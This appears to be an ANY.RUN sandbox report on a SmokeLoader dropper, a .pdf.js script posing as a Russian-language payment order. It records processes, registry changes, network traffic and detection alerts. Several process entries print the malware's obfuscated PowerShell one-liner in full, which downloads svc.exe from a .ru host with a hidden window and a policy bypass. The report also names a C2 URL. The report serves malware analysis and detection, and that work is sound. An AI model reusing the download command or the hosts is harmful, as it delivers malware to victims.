File name:

i_i_10.09.2024.rar

Full analysis: https://app.any.run/tasks/ccb41ee8-3603-4b81-b087-ffb6d09e90ba
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: September 11, 2024, 09:43:43
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
opendir
loader
smokeloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

BF64C4011ABF4785A25511B24C0B3459

SHA1:

4A5E081153535689F67487B5694E6C8E8EA46330

SHA256:

E77A6658A160C60BBBFB226F5418B637EDDE1A1066C9F43D61A40034B7FCCF5D

SSDEEP:

3072:XkrrW18L9xxZbpTVDTQ0IoYgT+njieeAWiDI4:XkrqWL9nppVDThIqTyjieeAhDn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)

    • Application was injected by another process

      • explorer.exe (PID: 4552)

    • Runs injected code in another process

      • TempaFY25.exe (PID: 5112)

    • SMOKE has been detected (SURICATA)

      • explorer.exe (PID: 4552)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6156)

    • The process executes JS scripts

      • WinRAR.exe (PID: 6156)
      • explorer.exe (PID: 4552)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 1640)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1640)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 1640)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)

    • Probably download files using WebClient

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6740)
      • cmd.exe (PID: 7128)
      • cmd.exe (PID: 6616)
      • cmd.exe (PID: 7092)
      • cmd.exe (PID: 6964)

    • The executable file from the user directory is run by the CMD process

      • TempaFY25.exe (PID: 5112)
      • TempAXY31.exe (PID: 7012)
      • TempAXY31.exe (PID: 6948)
      • TempaFY25.exe (PID: 6784)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • explorer.exe (PID: 4552)
      • powershell.exe (PID: 1172)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)

    • Executes application which crashes

      • TempAXY31.exe (PID: 7012)

    • Creates file in the systems drive root

      • explorer.exe (PID: 4552)

  • INFO

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 6156)
      • explorer.exe (PID: 4552)

    • The process uses the downloaded file

      • wscript.exe (PID: 1640)
      • WinRAR.exe (PID: 6156)
      • wscript.exe (PID: 6664)
      • wscript.exe (PID: 2768)
      • explorer.exe (PID: 4552)
      • wscript.exe (PID: 4364)
      • wscript.exe (PID: 5284)

    • Disables trace logs

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)

    • Checks proxy server information

      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 608)
      • WerFault.exe (PID: 5516)
      • powershell.exe (PID: 6768)
      • explorer.exe (PID: 4552)
      • slui.exe (PID: 6872)
      • powershell.exe (PID: 1172)
      • powershell.exe (PID: 2900)

    • Checks supported languages

      • TempaFY25.exe (PID: 5112)
      • TempAXY31.exe (PID: 7012)
      • TempAXY31.exe (PID: 6948)
      • TempaFY25.exe (PID: 2616)
      • TempaFY25.exe (PID: 6784)
      • TempAXY31.exe (PID: 6500)

    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4552)
      • notepad.exe (PID: 4576)

    • Manual execution by a user

      • wscript.exe (PID: 2768)
      • notepad.exe (PID: 4576)

    • Reads the software policy settings

      • WerFault.exe (PID: 5516)
      • slui.exe (PID: 5276)
      • slui.exe (PID: 6872)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 5516)
      • explorer.exe (PID: 4552)

    • Sends debugging messages

      • notepad++.exe (PID: 2112)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2900)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2024:09:09 23:15:16
ZipCRC: 0x3554975b
ZipCompressedSize: 3679
ZipUncompressedSize: 13102
ZipFileName: Платежное Поручение в iнозеной валюте.pdf.js
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
171
Monitored processes
38
Malicious processes
10
Suspicious processes
8

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe tempafy25.exe no specs tempaxy31.exe sppextcomobj.exe no specs slui.exe werfault.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe notepad.exe no specs tempaxy31.exe no specs #SMOKE explorer.exe notepad++.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe tempafy25.exe no specs slui.exe rundll32.exe no specs tempafy25.exe no specs tempaxy31.exe no specs winrar.exe no specs notepad.exe no specs notepad.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
568\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
608pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempAXY31.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
888"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\i_i_10.09.2024.rar.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1172pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempaFY25.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
1640"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa6156.14879\Платежное Поручение в iнозеной валюте.pdf.js" C:\Windows\System32\wscript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2108pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://haporproletioperavivo.ru/download/svc.exe','C:\Users\admin\AppData\Local\TempaFY25.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2112"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Desktop\Сопроводiтельни документи вiд 09.09.2024p.pdf.js"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Version:
7.91
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2208\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2252\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2264"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\DESKTOP-JGLLJLD-20240308-0110.logC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
Total events
95 644
Read events
95 206
Write events
419
Delete events
19

Modification events

(PID) Process:(4552) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000060280
Operation:writeName:VirtualDesktop
Value:
1000000030304456033BCEE44DE41B4E8AEC331E84F566D2
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\i_i_10.09.2024.rar.zip
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6156) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(1640) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
2ECA120000000000
(PID) Process:(2108) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
4
Suspicious files
11
Text files
18
Unknown types
1

Dropped files

PID
Process
Filename
Type
6156WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa6156.14879\Платежное Поручение в iнозеной валюте.pdf.jstext
MD5:503B0E0561D643FF0033F4DCBA2EB474
SHA256:CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
6156WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa6156.15335\Сопроводiтельни документи вiд 09.09.2024p.pdf.jstext
MD5:1D18D9C37723BB24871AC27B337C87A1
SHA256:5DEFF829CC94B2231BFD85695D667EE87A31F311BF412EA48445C3BB2370E2D5
5516WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_TempAXY31.exe_7258ae072254ecf92484efe9f7319b8723d8d4_61b0f82e_3fd3b79f-0bf4-4814-82a9-281c684fd947\Report.wer
MD5:
SHA256:
5516WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERBFB.tmp.WERInternalMetadata.xmlxml
MD5:493A5032848F3BA1ACE69AB03329AFA5
SHA256:922C3E8B37F9E77B1106E1CDDF47F42BD1DBA093F1EB671D92884335E9C42C80
4552explorer.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-msbinary
MD5:CD490DB4CCFB190B2F149178FE5F1C6B
SHA256:5831548AABA1FE5849703C75E77D65F69E92DAD1761CB3A3C02902BF63F6D8E9
4552explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datbinary
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
5516WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERC3A.tmp.xmlxml
MD5:E9273018D986DEB09BC548A667FE4B6B
SHA256:367FD700586A46F4458F6DFDE68D999F3212C28E56134C0E3F9E9E422AD97F3A
4552explorer.exeC:\Users\admin\Desktop\Платежное Поручение в iнозеной валюте.pdf.jsbinary
MD5:503B0E0561D643FF0033F4DCBA2EB474
SHA256:CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_imckgkba.0dy.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6156WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6156.16424\Платежное Поручение в iнозеной валюте.pdf.jsbinary
MD5:503B0E0561D643FF0033F4DCBA2EB474
SHA256:CEE3AC99FB4FC11130707FB5FEDAA2489F8A114385F4CDDD8857952F0581A2AD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
55
DNS requests
25
Threats
21

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3424
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2108
powershell.exe
GET
200
147.45.125.198:80
http://haporproletioperavivo.ru/download/svc.exe
unknown
suspicious
608
powershell.exe
GET
200
147.45.125.198:80
http://haporproletioperavivo.ru/download/svc.exe
unknown
suspicious
3244
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4552
explorer.exe
POST
404
194.58.112.174:80
http://johnfabiconinteraption.ru/index.php
unknown
unknown
6768
powershell.exe
GET
200
147.45.125.198:80
http://haporproletioperavivo.ru/download/svc.exe
unknown
suspicious
1148
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
1172
powershell.exe
GET
200
147.45.125.198:80
http://haporproletioperavivo.ru/download/svc.exe
unknown
suspicious
3244
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5796
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
3260
svchost.exe
40.113.103.199:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3424
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3424
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
5796
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
  • 40.127.240.158
  • 52.167.249.196
  • 51.104.136.2
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 88.221.169.152
whitelisted
google.com
  • 142.250.181.238
whitelisted
client.wns.windows.com
  • 40.113.103.199
  • 40.113.110.67
whitelisted
login.live.com
  • 20.190.159.64
  • 20.190.159.0
  • 40.126.31.67
  • 20.190.159.4
  • 20.190.159.68
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.23
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
haporproletioperavivo.ru
  • 147.45.125.198
unknown
slscr.update.microsoft.com
  • 40.127.169.103
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.166.126.56
whitelisted
watson.events.data.microsoft.com
  • 104.208.16.94
whitelisted

Threats

PID
Process
Class
Message
2108
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 23
2108
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2108
powershell.exe
Misc activity
ET INFO Packed Executable Download
2108
powershell.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
608
powershell.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
608
powershell.exe
Misc activity
ET INFO Packed Executable Download
608
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
6768
powershell.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
6768
powershell.exe
Misc activity
ET INFO Packed Executable Download
6768
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
5 ETPRO signatures available at the full report
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: error while getting certificate informations
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
i_i_10.09.2024.rar